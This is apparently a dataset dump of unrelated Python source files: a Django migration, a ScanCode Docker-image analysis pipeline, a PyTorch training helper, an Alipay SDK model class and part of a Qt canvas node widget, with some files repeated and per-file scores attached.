('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150, verbose_name='division name')),
('period_name', models.CharField(max_length=150, verbose_name='period name')),
('school_year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='divisions', to='leprikon.SchoolYear', verbose_name='school year')),
],
options={
'ordering': ('name',),
'verbose_name': 'school year division',
'verbose_name_plural': 'school year divisions',
},
),
migrations.AlterUniqueTogether(
name='schoolyeardivision',
unique_together=set([('school_year', 'name')]),
),
migrations.AddField(
model_name='course',
name='school_year_division',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='courses', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
),
migrations.AddField(
model_name='schoolyearperiod',
name='school_year_division',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='periods', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
),
migrations.RunPython(create_school_year_divisions),
] | leprikon/migrations/0015_school_year_divisions.py |
from itertools import count
from django.db import migrations, models
import django.db.models.deletion
def create_school_year_divisions(apps, schema_editor):
Course = apps.get_model('leprikon', 'Course')
CourseDiscount = apps.get_model('leprikon', 'CourseDiscount')
SchoolYearDivision = apps.get_model('leprikon', 'SchoolYearDivision')
SchoolYearPeriod = apps.get_model('leprikon', 'SchoolYearPeriod')
new_period_ids = {}
new_period_ids_fuzzy = {}
school_year_division_ids = {}
for course in Course.objects.order_by('id').iterator():
key = tuple(course.periods.order_by('id').values_list('id', flat=True))
if key not in school_year_division_ids:
name = course.unit
counter = count(2)
while SchoolYearDivision.objects.filter(
school_year_id=course.school_year_id,
name=name,
).exists():
name='{course_unit} {c}'.format(course_unit=course.unit, c=next(counter))
school_year_division = SchoolYearDivision.objects.create(
school_year_id=course.school_year_id,
name=name,
period_name=course.unit,
)
for period in course.periods.all():
old_period_id = period.id
period.id, period.pk = None, None
period.school_year_division = school_year_division
period.save()
new_period_ids[(key, old_period_id)] = period.id
new_period_ids_fuzzy[(key, period.name)] = period.id
school_year_division_ids[key] = school_year_division.id
course.school_year_division_id = school_year_division_ids[key]
course.save()
# fix discounts
for discount in CourseDiscount.objects.filter(
registration__subject_id=course.id
).select_related('period', 'registration'):
old_period = discount.period
discount.period = None
discount.period_id = new_period_ids.get((key, old_period.id))
if discount.period_id is None:
discount.period_id = new_period_ids_fuzzy.get((key, old_period.name))
discount.save()
# delete original periods
SchoolYearPeriod.objects.filter(school_year_division=None).delete()
class Migration(migrations.Migration):
dependencies = [
('leprikon', '0014_variable_symbol'),
]
operations = [
migrations.CreateModel(
name='SchoolYearDivision',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150, verbose_name='division name')),
('period_name', models.CharField(max_length=150, verbose_name='period name')),
('school_year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='divisions', to='leprikon.SchoolYear', verbose_name='school year')),
],
options={
'ordering': ('name',),
'verbose_name': 'school year division',
'verbose_name_plural': 'school year divisions',
},
),
migrations.AlterUniqueTogether(
name='schoolyeardivision',
unique_together=set([('school_year', 'name')]),
),
migrations.AddField(
model_name='course',
name='school_year_division',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='courses', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
),
migrations.AddField(
model_name='schoolyearperiod',
name='school_year_division',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='periods', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
),
migrations.RunPython(create_school_year_divisions),
] | 0.47658 | 0.301528 |
# isort:skip_file
import os
import django
django.setup()
from scanpipe import pipes
from scanpipe.pipelines import Pipeline
from scanpipe.pipelines import step
from scanpipe.pipes import docker as docker_pipes
from scanpipe.pipes import rootfs as rootfs_pipes
class DockerPipeline(Pipeline):
"""
A pipeline to analyze a Docker image.
"""
@step
def start(self):
"""
Load the Project instance.
"""
self.project = self.get_project(self.project_name)
self.next(self.extract_images)
@step
def extract_images(self):
"""
Extract the images from tarballs.
"""
self.images = docker_pipes.get_and_extract_images_from_image_tarballs(
self.project
)
self.next(self.extract_layers)
@step
def extract_layers(self):
"""
Extract layers from images.
"""
for image in self.images:
image_dirname = os.path.basename(image.base_location)
target_dir = str(self.project.codebase_path / image_dirname)
image.extract_layers(target_dir=target_dir)
self.next(self.find_images_linux_distro)
@step
def find_images_linux_distro(self):
"""
Find the linux distro of the images.
"""
for image in self.images:
image.get_and_set_distro()
self.next(self.collect_images_information)
@step
def collect_images_information(self):
"""
Collect images information and store on project.
"""
images_data = [docker_pipes.get_image_data(image) for image in self.images]
self.project.extra_data.update({"images": images_data})
self.project.save()
self.next(self.collect_and_create_codebase_resources)
@step
def collect_and_create_codebase_resources(self):
"""
Collect and create all image files as CodebaseResource.
"""
for image in self.images:
docker_pipes.create_codebase_resources(self.project, image)
self.next(self.collect_and_create_system_packages)
@step
def collect_and_create_system_packages(self):
"""
Collect installed system packages for each layer based on the distro.
"""
for image in self.images:
docker_pipes.scan_image_for_system_packages(self.project, image)
self.next(self.tag_uninteresting_codebase_resources)
@step
def tag_uninteresting_codebase_resources(self):
"""
Flag remaining files not from a system package.
"""
docker_pipes.tag_whiteout_codebase_resources(self.project)
rootfs_pipes.tag_uninteresting_codebase_resources(self.project)
self.next(self.scan_for_application_packages)
@step
def scan_for_application_packages(self):
"""
Scan unknown resources for packages infos.
"""
pipes.scan_for_application_packages(self.project)
self.next(self.scan_for_files)
@step
def scan_for_files(self):
"""
Scan unknown resources for copyrights, licenses, emails, and urls.
"""
pipes.scan_for_files(self.project)
self.next(self.analyze_scanned_files)
@step
def analyze_scanned_files(self):
"""
Analyze single file scan results for completeness.
"""
pipes.analyze_scanned_files(self.project)
self.next(self.tag_not_analyzed_codebase_resources)
@step
def tag_not_analyzed_codebase_resources(self):
"""
Check for leftover files for sanity. We should have none.
"""
pipes.tag_not_analyzed_codebase_resources(self.project)
self.next(self.end)
@step
def end(self):
"""
Analysis completed.
"""
if __name__ == "__main__":
DockerPipeline() | scanpipe/pipelines/docker.py |
# isort:skip_file
import os
import django
django.setup()
from scanpipe import pipes
from scanpipe.pipelines import Pipeline
from scanpipe.pipelines import step
from scanpipe.pipes import docker as docker_pipes
from scanpipe.pipes import rootfs as rootfs_pipes
class DockerPipeline(Pipeline):
"""
A pipeline to analyze a Docker image.
"""
@step
def start(self):
"""
Load the Project instance.
"""
self.project = self.get_project(self.project_name)
self.next(self.extract_images)
@step
def extract_images(self):
"""
Extract the images from tarballs.
"""
self.images = docker_pipes.get_and_extract_images_from_image_tarballs(
self.project
)
self.next(self.extract_layers)
@step
def extract_layers(self):
"""
Extract layers from images.
"""
for image in self.images:
image_dirname = os.path.basename(image.base_location)
target_dir = str(self.project.codebase_path / image_dirname)
image.extract_layers(target_dir=target_dir)
self.next(self.find_images_linux_distro)
@step
def find_images_linux_distro(self):
"""
Find the linux distro of the images.
"""
for image in self.images:
image.get_and_set_distro()
self.next(self.collect_images_information)
@step
def collect_images_information(self):
"""
Collect images information and store on project.
"""
images_data = [docker_pipes.get_image_data(image) for image in self.images]
self.project.extra_data.update({"images": images_data})
self.project.save()
self.next(self.collect_and_create_codebase_resources)
@step
def collect_and_create_codebase_resources(self):
"""
Collect and create all image files as CodebaseResource.
"""
for image in self.images:
docker_pipes.create_codebase_resources(self.project, image)
self.next(self.collect_and_create_system_packages)
@step
def collect_and_create_system_packages(self):
"""
Collect installed system packages for each layer based on the distro.
"""
for image in self.images:
docker_pipes.scan_image_for_system_packages(self.project, image)
self.next(self.tag_uninteresting_codebase_resources)
@step
def tag_uninteresting_codebase_resources(self):
"""
Flag remaining files not from a system package.
"""
docker_pipes.tag_whiteout_codebase_resources(self.project)
rootfs_pipes.tag_uninteresting_codebase_resources(self.project)
self.next(self.scan_for_application_packages)
@step
def scan_for_application_packages(self):
"""
Scan unknown resources for packages infos.
"""
pipes.scan_for_application_packages(self.project)
self.next(self.scan_for_files)
@step
def scan_for_files(self):
"""
Scan unknown resources for copyrights, licenses, emails, and urls.
"""
pipes.scan_for_files(self.project)
self.next(self.analyze_scanned_files)
@step
def analyze_scanned_files(self):
"""
Analyze single file scan results for completeness.
"""
pipes.analyze_scanned_files(self.project)
self.next(self.tag_not_analyzed_codebase_resources)
@step
def tag_not_analyzed_codebase_resources(self):
"""
Check for leftover files for sanity. We should have none.
"""
pipes.tag_not_analyzed_codebase_resources(self.project)
self.next(self.end)
@step
def end(self):
"""
Analysis completed.
"""
if __name__ == "__main__":
DockerPipeline() | 0.547948 | 0.329365 |
import sys
import os
import numpy as np
from collections import OrderedDict
import torch
import torch.nn.functional as F
from src.utils import Print
class Trainer():
""" train / eval helper class """
def __init__(self, model):
self.model = model
self.optim = None
self.scheduler = None
# initialize logging parameters
self.epoch = 0.0
self.best_loss = None
self.logger_train = Logger()
self.logger_eval = Logger()
def train(self, batch, device):
# training of the model
batch = set_device(batch, device)
self.model.train()
self.optim.zero_grad()
inputs, labels, set_idxs = batch
outputs = self.model(inputs)
loss = get_loss(outputs, labels)
loss.backward()
self.optim.step()
# logging
outputs = torch.sigmoid(outputs)
self.logger_train.update(len(outputs), loss.item())
self.logger_train.keep(outputs, set_idxs)
def evaluate(self, batch, device):
# evaluation of the model
batch = set_device(batch, device)
self.model.eval()
with torch.no_grad():
inputs, labels, set_idxs = batch
outputs = self.model(inputs)
loss = get_loss(outputs, labels)
# logging
outputs = torch.sigmoid(outputs)
self.logger_eval.update(len(outputs), loss.item())
self.logger_eval.keep(outputs, set_idxs)
def scheduler_step(self):
# scheduler_step
self.scheduler.step(self.logger_eval.get_loss())
def save_model(self, save_prefix):
# save state_dicts to checkpoint """
if save_prefix is None: return
loss = self.logger_eval.get_loss()
if self.best_loss is None or loss < self.best_loss:
self.best_loss = loss
torch.save(self.model.state_dict(), save_prefix + "/TargetNet.pt")
def load_model(self, checkpoint, output):
# load state_dicts from checkpoint """
Print('loading a model state_dict from the checkpoint', output)
checkpoint = torch.load(checkpoint, map_location="cpu")
state_dict = OrderedDict()
for k, v in checkpoint.items():
if k.startswith("module."): k = k[7:]
state_dict[k] = v
self.model.load_state_dict(state_dict)
def save_outputs(self, idx, save_prefix):
# save validation output
OUT = open(save_prefix + "/%s_outputs.txt" % (idx), "w")
OUT.write("\t".join(["set_idx", "output"]) + "\n")
for i in range(len(self.logger_eval.outputs)):
OUT.write("\t".join([str(i), "%f" % self.logger_eval.outputs[i]]) + "\n")
if i % 5 == 0:
print('# {} {:.1%}'.format(idx, i / len(self.logger_eval.outputs)), end='\r', file=sys.stderr)
print(' ' * 150, end='\r', file=sys.stderr)
OUT.close()
self.log_reset()
def set_device(self, device):
# set gpu configurations
self.model = self.model.to(device)
def set_optim_scheduler(self, run_cfg, params):
# set optim and scheduler for training
optim, scheduler = get_optim_scheduler(run_cfg, params)
self.optim = optim
self.scheduler = scheduler
def aggregate(self, set_num):
# aggregate kept outputs, labels, set_idxs
self.logger_eval.aggregate(set_num)
def get_headline(self):
# get a headline for logging
headline = ["ep", "split", "loss", "|", "loss"]
return "\t".join(headline)
def log(self, idx, output):
# logging
log = ["%03d" % self.epoch, "train",
"%.4f" % self.logger_train.get_loss(), "|", idx, "%.4f" % self.logger_eval.get_loss()]
Print("\t".join(log), output)
self.log_reset()
def log_reset(self):
# reset logging parameters
self.logger_train.reset()
self.logger_eval.reset()
class Logger():
""" Logger class """
def __init__(self):
self.total = 0.0
self.loss = 0.0
self.outputs = []
self.set_idxs = []
self.log = []
def update(self, total, loss):
# update logger for current mini-batch
self.total += total
self.loss += loss * total
def keep(self, outputs, set_idxs):
# keep outputs, labels, and set_idxs for future computations
self.outputs.append(outputs.cpu().detach().numpy())
self.set_idxs.append(set_idxs.cpu().detach().numpy())
def get_loss(self):
# get current averaged loss
loss = self.loss / self.total
return loss
def aggregate(self, set_labels):
# aggregate kept labels and outputs
self.outputs = np.concatenate(self.outputs, axis=0)
self.set_idxs = np.concatenate(self.set_idxs, axis=0)
set_num = len(set_labels)
if len(self.set_idxs) != set_num:
set_outputs = np.zeros(set_num, np.float32)
for i in range(set_num):
idxs = self.set_idxs == i
if np.max(idxs) > 0: set_outputs[i] = np.max(self.outputs[idxs])
self.outputs = set_outputs
self.set_idxs = np.zeros(set_num, np.float32)
def reset(self):
# reset logger
self.total = 0.0
self.loss = 0.0
self.outputs = []
self.set_idxs = []
self.log = []
def get_optim_scheduler(cfg, params):
""" configure optim and scheduler """
optim = torch.optim.Adam([{'params': params[0], 'weight_decay': cfg.weight_decay},
{'params': params[1], 'weight_decay': 0}], lr=cfg.learning_rate)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optim, "min", 0.2, 5)
return optim, scheduler
def get_loss(outputs, labels):
""" get (binary) cross entropy loss """
loss = -torch.mean(labels * F.logsigmoid(outputs) + (1 - labels) * F.logsigmoid(-outputs))
return loss
def set_device(batch, device):
""" recursive function for setting device for batch """
if isinstance(batch, tuple) or isinstance(batch, list):
return [set_device(t, device) for t in batch]
elif isinstance(batch, torch.Tensor):
return batch.to(device)
else:
return batch | src/train.py |
import sys
import os
import numpy as np
from collections import OrderedDict
import torch
import torch.nn.functional as F
from src.utils import Print
class Trainer():
""" train / eval helper class """
def __init__(self, model):
self.model = model
self.optim = None
self.scheduler = None
# initialize logging parameters
self.epoch = 0.0
self.best_loss = None
self.logger_train = Logger()
self.logger_eval = Logger()
def train(self, batch, device):
# training of the model
batch = set_device(batch, device)
self.model.train()
self.optim.zero_grad()
inputs, labels, set_idxs = batch
outputs = self.model(inputs)
loss = get_loss(outputs, labels)
loss.backward()
self.optim.step()
# logging
outputs = torch.sigmoid(outputs)
self.logger_train.update(len(outputs), loss.item())
self.logger_train.keep(outputs, set_idxs)
def evaluate(self, batch, device):
# evaluation of the model
batch = set_device(batch, device)
self.model.eval()
with torch.no_grad():
inputs, labels, set_idxs = batch
outputs = self.model(inputs)
loss = get_loss(outputs, labels)
# logging
outputs = torch.sigmoid(outputs)
self.logger_eval.update(len(outputs), loss.item())
self.logger_eval.keep(outputs, set_idxs)
def scheduler_step(self):
# scheduler_step
self.scheduler.step(self.logger_eval.get_loss())
def save_model(self, save_prefix):
# save state_dicts to checkpoint """
if save_prefix is None: return
loss = self.logger_eval.get_loss()
if self.best_loss is None or loss < self.best_loss:
self.best_loss = loss
torch.save(self.model.state_dict(), save_prefix + "/TargetNet.pt")
def load_model(self, checkpoint, output):
# load state_dicts from checkpoint """
Print('loading a model state_dict from the checkpoint', output)
checkpoint = torch.load(checkpoint, map_location="cpu")
state_dict = OrderedDict()
for k, v in checkpoint.items():
if k.startswith("module."): k = k[7:]
state_dict[k] = v
self.model.load_state_dict(state_dict)
def save_outputs(self, idx, save_prefix):
# save validation output
OUT = open(save_prefix + "/%s_outputs.txt" % (idx), "w")
OUT.write("\t".join(["set_idx", "output"]) + "\n")
for i in range(len(self.logger_eval.outputs)):
OUT.write("\t".join([str(i), "%f" % self.logger_eval.outputs[i]]) + "\n")
if i % 5 == 0:
print('# {} {:.1%}'.format(idx, i / len(self.logger_eval.outputs)), end='\r', file=sys.stderr)
print(' ' * 150, end='\r', file=sys.stderr)
OUT.close()
self.log_reset()
def set_device(self, device):
# set gpu configurations
self.model = self.model.to(device)
def set_optim_scheduler(self, run_cfg, params):
# set optim and scheduler for training
optim, scheduler = get_optim_scheduler(run_cfg, params)
self.optim = optim
self.scheduler = scheduler
def aggregate(self, set_num):
# aggregate kept outputs, labels, set_idxs
self.logger_eval.aggregate(set_num)
def get_headline(self):
# get a headline for logging
headline = ["ep", "split", "loss", "|", "loss"]
return "\t".join(headline)
def log(self, idx, output):
# logging
log = ["%03d" % self.epoch, "train",
"%.4f" % self.logger_train.get_loss(), "|", idx, "%.4f" % self.logger_eval.get_loss()]
Print("\t".join(log), output)
self.log_reset()
def log_reset(self):
# reset logging parameters
self.logger_train.reset()
self.logger_eval.reset()
class Logger():
""" Logger class """
def __init__(self):
self.total = 0.0
self.loss = 0.0
self.outputs = []
self.set_idxs = []
self.log = []
def update(self, total, loss):
# update logger for current mini-batch
self.total += total
self.loss += loss * total
def keep(self, outputs, set_idxs):
# keep outputs, labels, and set_idxs for future computations
self.outputs.append(outputs.cpu().detach().numpy())
self.set_idxs.append(set_idxs.cpu().detach().numpy())
def get_loss(self):
# get current averaged loss
loss = self.loss / self.total
return loss
def aggregate(self, set_labels):
# aggregate kept labels and outputs
self.outputs = np.concatenate(self.outputs, axis=0)
self.set_idxs = np.concatenate(self.set_idxs, axis=0)
set_num = len(set_labels)
if len(self.set_idxs) != set_num:
set_outputs = np.zeros(set_num, np.float32)
for i in range(set_num):
idxs = self.set_idxs == i
if np.max(idxs) > 0: set_outputs[i] = np.max(self.outputs[idxs])
self.outputs = set_outputs
self.set_idxs = np.zeros(set_num, np.float32)
def reset(self):
# reset logger
self.total = 0.0
self.loss = 0.0
self.outputs = []
self.set_idxs = []
self.log = []
def get_optim_scheduler(cfg, params):
""" configure optim and scheduler """
optim = torch.optim.Adam([{'params': params[0], 'weight_decay': cfg.weight_decay},
{'params': params[1], 'weight_decay': 0}], lr=cfg.learning_rate)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optim, "min", 0.2, 5)
return optim, scheduler
def get_loss(outputs, labels):
""" get (binary) cross entropy loss """
loss = -torch.mean(labels * F.logsigmoid(outputs) + (1 - labels) * F.logsigmoid(-outputs))
return loss
def set_device(batch, device):
""" recursive function for setting device for batch """
if isinstance(batch, tuple) or isinstance(batch, list):
return [set_device(t, device) for t in batch]
elif isinstance(batch, torch.Tensor):
return batch.to(device)
else:
return batch | 0.682574 | 0.193452 |
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OperateTask import OperateTask
class AlipayCommerceAbntaskModifyModel(object):
def __init__(self):
self._operate_task_list = None
self._operation_time = None
self._operator_id = None
self._operator_nick = None
@property
def operate_task_list(self):
return self._operate_task_list
@operate_task_list.setter
def operate_task_list(self, value):
if isinstance(value, list):
self._operate_task_list = list()
for i in value:
if isinstance(i, OperateTask):
self._operate_task_list.append(i)
else:
self._operate_task_list.append(OperateTask.from_alipay_dict(i))
@property
def operation_time(self):
return self._operation_time
@operation_time.setter
def operation_time(self, value):
self._operation_time = value
@property
def operator_id(self):
return self._operator_id
@operator_id.setter
def operator_id(self, value):
self._operator_id = value
@property
def operator_nick(self):
return self._operator_nick
@operator_nick.setter
def operator_nick(self, value):
self._operator_nick = value
def to_alipay_dict(self):
params = dict()
if self.operate_task_list:
if isinstance(self.operate_task_list, list):
for i in range(0, len(self.operate_task_list)):
element = self.operate_task_list[i]
if hasattr(element, 'to_alipay_dict'):
self.operate_task_list[i] = element.to_alipay_dict()
if hasattr(self.operate_task_list, 'to_alipay_dict'):
params['operate_task_list'] = self.operate_task_list.to_alipay_dict()
else:
params['operate_task_list'] = self.operate_task_list
if self.operation_time:
if hasattr(self.operation_time, 'to_alipay_dict'):
params['operation_time'] = self.operation_time.to_alipay_dict()
else:
params['operation_time'] = self.operation_time
if self.operator_id:
if hasattr(self.operator_id, 'to_alipay_dict'):
params['operator_id'] = self.operator_id.to_alipay_dict()
else:
params['operator_id'] = self.operator_id
if self.operator_nick:
if hasattr(self.operator_nick, 'to_alipay_dict'):
params['operator_nick'] = self.operator_nick.to_alipay_dict()
else:
params['operator_nick'] = self.operator_nick
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceAbntaskModifyModel()
if 'operate_task_list' in d:
o.operate_task_list = d['operate_task_list']
if 'operation_time' in d:
o.operation_time = d['operation_time']
if 'operator_id' in d:
o.operator_id = d['operator_id']
if 'operator_nick' in d:
o.operator_nick = d['operator_nick']
return o | alipay/aop/api/domain/AlipayCommerceAbntaskModifyModel.py | import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OperateTask import OperateTask
class AlipayCommerceAbntaskModifyModel(object):
def __init__(self):
self._operate_task_list = None
self._operation_time = None
self._operator_id = None
self._operator_nick = None
@property
def operate_task_list(self):
return self._operate_task_list
@operate_task_list.setter
def operate_task_list(self, value):
if isinstance(value, list):
self._operate_task_list = list()
for i in value:
if isinstance(i, OperateTask):
self._operate_task_list.append(i)
else:
self._operate_task_list.append(OperateTask.from_alipay_dict(i))
@property
def operation_time(self):
return self._operation_time
@operation_time.setter
def operation_time(self, value):
self._operation_time = value
@property
def operator_id(self):
return self._operator_id
@operator_id.setter
def operator_id(self, value):
self._operator_id = value
@property
def operator_nick(self):
return self._operator_nick
@operator_nick.setter
def operator_nick(self, value):
self._operator_nick = value
def to_alipay_dict(self):
params = dict()
if self.operate_task_list:
if isinstance(self.operate_task_list, list):
for i in range(0, len(self.operate_task_list)):
element = self.operate_task_list[i]
if hasattr(element, 'to_alipay_dict'):
self.operate_task_list[i] = element.to_alipay_dict()
if hasattr(self.operate_task_list, 'to_alipay_dict'):
params['operate_task_list'] = self.operate_task_list.to_alipay_dict()
else:
params['operate_task_list'] = self.operate_task_list
if self.operation_time:
if hasattr(self.operation_time, 'to_alipay_dict'):
params['operation_time'] = self.operation_time.to_alipay_dict()
else:
params['operation_time'] = self.operation_time
if self.operator_id:
if hasattr(self.operator_id, 'to_alipay_dict'):
params['operator_id'] = self.operator_id.to_alipay_dict()
else:
params['operator_id'] = self.operator_id
if self.operator_nick:
if hasattr(self.operator_nick, 'to_alipay_dict'):
params['operator_nick'] = self.operator_nick.to_alipay_dict()
else:
params['operator_nick'] = self.operator_nick
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceAbntaskModifyModel()
if 'operate_task_list' in d:
o.operate_task_list = d['operate_task_list']
if 'operation_time' in d:
o.operation_time = d['operation_time']
if 'operator_id' in d:
o.operator_id = d['operator_id']
if 'operator_nick' in d:
o.operator_nick = d['operator_nick']
return o | 0.413951 | 0.066357 |
import string
from xml.sax.saxutils import escape
from AnyQt.QtWidgets import (
QGraphicsItem,
QGraphicsObject,
QGraphicsTextItem,
QGraphicsWidget,
QGraphicsDropShadowEffect,
QStyle,
QApplication,
)
from AnyQt.QtGui import (
QPen,
QBrush,
QColor,
QPalette,
QIcon,
QPainter,
QPainterPath,
QPainterPathStroker,
)
from AnyQt.QtCore import (
Qt,
QEvent,
QPointF,
QRectF,
QRect,
QSize,
QTimer,
QPropertyAnimation,
)
from AnyQt.QtCore import pyqtSignal as Signal, pyqtProperty as Property
from .graphicspathobject import GraphicsPathObject
from .utils import saturated, radial_gradient
from ...scheme.node import UserMessage
from ...registry import NAMED_COLORS
from ...resources import icon_loader
from .utils import uniform_linear_layout
def create_palette(light_color, color):
"""
Return a new :class:`QPalette` from for the :class:`NodeBodyItem`.
"""
palette = QPalette()
palette.setColor(QPalette.Inactive, QPalette.Light, saturated(light_color, 50))
palette.setColor(QPalette.Inactive, QPalette.Midlight, saturated(light_color, 90))
palette.setColor(QPalette.Inactive, QPalette.Button, light_color)
palette.setColor(QPalette.Active, QPalette.Light, saturated(color, 50))
palette.setColor(QPalette.Active, QPalette.Midlight, saturated(color, 90))
palette.setColor(QPalette.Active, QPalette.Button, color)
palette.setColor(QPalette.ButtonText, QColor("#515151"))
return palette
def default_palette():
"""
Create and return a default palette for a node.
"""
return create_palette(
QColor(NAMED_COLORS["light-yellow"]), QColor(NAMED_COLORS["yellow"])
)
def animation_restart(animation):
if animation.state() == QPropertyAnimation.Running:
animation.pause()
animation.start()
SHADOW_COLOR = "#9CACB4"
FOCUS_OUTLINE_COLOR = "#609ED7"
class NodeBodyItem(GraphicsPathObject):
"""
The central part (body) of the `NodeItem`.
"""
def __init__(self, parent=None):
GraphicsPathObject.__init__(self, parent)
assert isinstance(parent, NodeItem)
self.__processingState = 0
self.__progress = -1
self.__animationEnabled = False
self.__isSelected = False
self.__hasFocus = False
self.__hover = False
self.__shapeRect = QRectF(-10, -10, 20, 20)
self.setAcceptHoverEvents(True)
self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
self.setPen(QPen(Qt.NoPen))
self.setPalette(default_palette())
self.shadow = QGraphicsDropShadowEffect(
blurRadius=3, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
)
self.shadow.setEnabled(True)
# An item with the same shape as this object, stacked behind this
# item as a source for QGraphicsDropShadowEffect. Cannot attach
# the effect to this item directly as QGraphicsEffect makes the item
# non devicePixelRatio aware.
shadowitem = GraphicsPathObject(self, objectName="shadow-shape-item")
shadowitem.setPen(Qt.NoPen)
shadowitem.setBrush(QBrush(QColor(SHADOW_COLOR).lighter()))
shadowitem.setGraphicsEffect(self.shadow)
shadowitem.setFlag(QGraphicsItem.ItemStacksBehindParent)
self.__shadow = shadowitem
self.__blurAnimation = QPropertyAnimation(self.shadow, b"blurRadius", self)
self.__blurAnimation.setDuration(100)
self.__blurAnimation.finished.connect(self.__on_finished)
self.__pingAnimation = QPropertyAnimation(self, b"scale", self)
self.__pingAnimation.setDuration(250)
self.__pingAnimation.setKeyValues([(0.0, 1.0), (0.5, 1.1), (1.0, 1.0)])
# TODO: The body item should allow the setting of arbitrary painter
# paths (for instance rounded rect, ...)
def setShapeRect(self, rect):
"""
Set the item's shape `rect`. The item should be confined within
this rect.
"""
path = QPainterPath()
path.addEllipse(rect)
self.setPath(path)
self.__shadow.setPath(path)
self.__shapeRect = rect
def setPalette(self, palette):
"""
Set the body color palette (:class:`QPalette`).
"""
self.palette = palette
self.__updateBrush()
def setAnimationEnabled(self, enabled):
"""
Set the node animation enabled.
"""
if self.__animationEnabled != enabled:
self.__animationEnabled = enabled
def setProcessingState(self, state):
"""
Set the processing state of the node.
"""
if self.__processingState != state:
self.__processingState = state
if not state and self.__animationEnabled:
self.ping()
def setProgress(self, progress):
"""
Set the progress indicator state of the node. `progress` should
be a number between 0 and 100.
"""
self.__progress = progress
self.update()
def ping(self):
"""
Trigger a 'ping' animation.
"""
animation_restart(self.__pingAnimation)
def hoverEnterEvent(self, event):
self.__hover = True
self.__updateShadowState()
return GraphicsPathObject.hoverEnterEvent(self, event)
def hoverLeaveEvent(self, event):
self.__hover = False
self.__updateShadowState()
return GraphicsPathObject.hoverLeaveEvent(self, event)
def paint(self, painter, option, widget):
"""
Paint the shape and a progress meter.
"""
# Let the default implementation draw the shape
if option.state & QStyle.State_Selected:
# Prevent the default bounding rect selection indicator.
option.state = option.state ^ QStyle.State_Selected
GraphicsPathObject.paint(self, painter, option, widget)
if self.__progress >= 0:
# Draw the progress meter over the shape.
# Set the clip to shape so the meter does not overflow the shape.
painter.save()
painter.setClipPath(self.shape(), Qt.ReplaceClip)
color = self.palette.color(QPalette.ButtonText)
pen = QPen(color, 5)
painter.setPen(pen)
painter.setRenderHints(QPainter.Antialiasing)
span = max(1, int(self.__progress * 57.60))
painter.drawArc(self.__shapeRect, 90 * 16, -span)
painter.restore()
def __updateShadowState(self):
if self.__hasFocus:
color = QColor(FOCUS_OUTLINE_COLOR)
self.setPen(QPen(color, 1.5))
else:
self.setPen(QPen(Qt.NoPen))
radius = 3
enabled = False
if self.__isSelected:
enabled = True
radius = 7
if self.__hover:
radius = 17
enabled = True
if enabled and not self.shadow.isEnabled():
self.shadow.setEnabled(enabled)
if self.__animationEnabled:
if self.__blurAnimation.state() == QPropertyAnimation.Running:
self.__blurAnimation.pause()
self.__blurAnimation.setStartValue(self.shadow.blurRadius())
self.__blurAnimation.setEndValue(radius)
self.__blurAnimation.start()
else:
self.shadow.setBlurRadius(radius)
def __updateBrush(self):
palette = self.palette
if self.__isSelected:
cg = QPalette.Active
else:
cg = QPalette.Inactive
palette.setCurrentColorGroup(cg)
c1 = palette.color(QPalette.Light)
c2 = palette.color(QPalette.Button)
grad = radial_gradient(c2, c1)
self.setBrush(QBrush(grad))
# TODO: The selected and focus states should be set using the
# QStyle flags (State_Selected. State_HasFocus)
def setSelected(self, selected):
"""
Set the `selected` state.
.. note:: The item does not have `QGraphicsItem.ItemIsSelectable` flag.
This property is instead controlled by the parent NodeItem.
"""
self.__isSelected = selected
self.__updateBrush()
def setHasFocus(self, focus):
"""
Set the `has focus` state.
.. note:: The item does not have `QGraphicsItem.ItemIsFocusable` flag.
This property is instead controlled by the parent NodeItem.
"""
self.__hasFocus = focus
self.__updateShadowState()
def __on_finished(self):
if self.shadow.blurRadius() == 0:
self.shadow.setEnabled(False)
class AnchorPoint(QGraphicsObject):
"""
A anchor indicator on the :class:`NodeAnchorItem`.
"""
#: Signal emitted when the item's scene position changes.
scenePositionChanged = Signal(QPointF)
#: Signal emitted when the item's `anchorDirection` changes.
anchorDirectionChanged = Signal(QPointF)
def __init__(self, *args):
QGraphicsObject.__init__(self, *args)
self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
self.setFlag(QGraphicsItem.ItemHasNoContents, True)
self.__direction = QPointF()
def anchorScenePos(self):
"""
Return anchor position in scene coordinates.
"""
return self.mapToScene(QPointF(0, 0))
def setAnchorDirection(self, direction):
"""
Set the preferred direction (QPointF) in item coordinates.
"""
if self.__direction != direction:
self.__direction = direction
self.anchorDirectionChanged.emit(direction)
def anchorDirection(self):
"""
Return the preferred anchor direction.
"""
return self.__direction
def itemChange(self, change, value):
if change == QGraphicsItem.ItemScenePositionHasChanged:
self.scenePositionChanged.emit(value)
return QGraphicsObject.itemChange(self, change, value)
def boundingRect(self,):
return QRectF()
class NodeAnchorItem(GraphicsPathObject):
"""
The left/right widget input/output anchors.
"""
def __init__(self, parent, *args):
GraphicsPathObject.__init__(self, parent, *args)
self.setAcceptHoverEvents(True)
self.setPen(QPen(Qt.NoPen))
self.normalBrush = QBrush(QColor("#CDD5D9"))
